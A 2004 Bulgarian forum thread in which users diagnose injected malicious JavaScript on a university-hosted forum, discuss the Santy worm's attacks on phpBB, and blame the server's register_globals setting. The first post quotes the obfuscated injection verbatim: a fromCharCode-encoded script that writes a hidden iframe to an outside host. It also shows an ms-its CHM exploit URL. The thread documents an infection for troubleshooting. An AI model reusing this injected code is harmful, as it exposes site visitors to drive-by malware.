Проблем с форума

icaci · Мнение от **icaci** » 23 Дек 2004, 01:28

Димо, нормално ли е форумът да връща следния HTML в някои от категориите?:

<script language=javascript>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,
105,116,101,40,39,60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,49,32,119,105,
100,116,104,61,49,32,115,114,99,61,104,116,116,112,58,47,47,112,97,100,111,110,97,107,46,
105,110,102,111,47,102,97,47,32,62,60,47,105,102,114,97,109,101,62,39,41,59))</script><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="ltr">
<head>
...

и да ми стартира Java виртуалната машина (добре, че Sun-ската Java за разлика от Microsoft-ската показва иконка в трей-бара)?

При това в JavaScript конзолата на Firefox-а получавам съобщения от вида:

Error: invalid quantifier {
Source File: http://padonak.info/fa/x.htm
Line: 6, Column: 33
Source Code:
document.write(cxw.value.replace(/\${PR}/g,'ms-its:mhtml:file://c:\\nosuch.mht!http://padonak.info/fa/x.chm::/x.htm'));

Добре, че ползвам Firefox, а не IE, и както изглежда повредата този път не е в моя телевизор, тъй като това става само когато посещавам този форум

Ето как изглеждат нещата в действителност:

[/img]

icaci · Мнение от **icaci** » 23 Дек 2004, 02:40

Всъщност вече сън мапълно убеден, че проблемът не е в моя телевизор - същия JavaScript се появява и когато достъпвам форума от Unix машина в университета с текстов браузър без поддържка на JavaScript, известен с името wget

Интересното е, че не на всяка заявка се получава "заразена" версия, но средно по една на всеки 5 до 10 заявки е такава.
Като гледам наличието на DOCTYPE след JavaScript-а, то явно този код се добавя след като PHP-то изгенерира WEB страницата. Взимайки предвид различните пътища, по които минават пакетите до тук и до машината в университета, то проблемът явно е на самият WEB сървър. И тъй като смятам, че в УИЦ работят специалисти, то вероятността някой да е хакнал тези машините е минимална, и ... това ме навежда на някои много тревожни мисли.

stone · Мнение от **stone** » 23 Дек 2004, 08:45

При мен не е имало подобен проблем!
Но в мрежата се разпространява нов вирус от типа “червей”, който идентифицира потенциалните си жертви, като търси чрез Google сред форумите, използващи уязвима за атаки версия на софтуера phpBB.

Новият червей, който се нарича Santy, използва дупка в сигурността на популярния софтуер за форуми, известен под името PHP Bulletin Board (phpBB), за да заразява нови компютри. Вирусът използва Google, за да търси сайтове, на които е инсталирана подходяща за целта версия на продукта.
Червеят изпраща на търсачката специфична заявка, чрез която получава списък със сайтове, които са уязвими. След това той използва дупка в сигурността на форума, за да зарази компютъра. Това вероятно е първата програма, която използва търсачката Google, за да търси потенциални жертви за атака. След заразяването тя изтрива целия форум и добавя текста "NeverEverNoSanity".
Около 6 милиона сайта по света използват софтуера за форуми phpBB. Анализ на експерти показва, че се използва съвсем нова уязвимост, която бе открита миналата седмица. Вече е достъпна нова версия на софтуера, в която опасността е преодоляна.

Ако не сте ъпдейтнали форума - направете го!

Мнение от **dimo** » 23 Дек 2004, 08:53

Форума е с последна версия, както и PHP-то, но заради сайта на Философския факултет, който изисква register_globals=on, което е най-опасното в света на PHP, и разни други сайтчета, които който както си иска е писал, а трябва да се хостват при мен, май сървъра донякъде прилича на сирене (от това с дупките). Аз бях направил каквото мога след като имаше подобен проблем преди месец, но май този път ще трябва да предприема по-крути мерки! Но ще е след празниците - сега засега това вирусче съм го махнал отново.

icaci · Мнение от **icaci** » 23 Дек 2004, 12:07

Ааааа, register_globals... ясно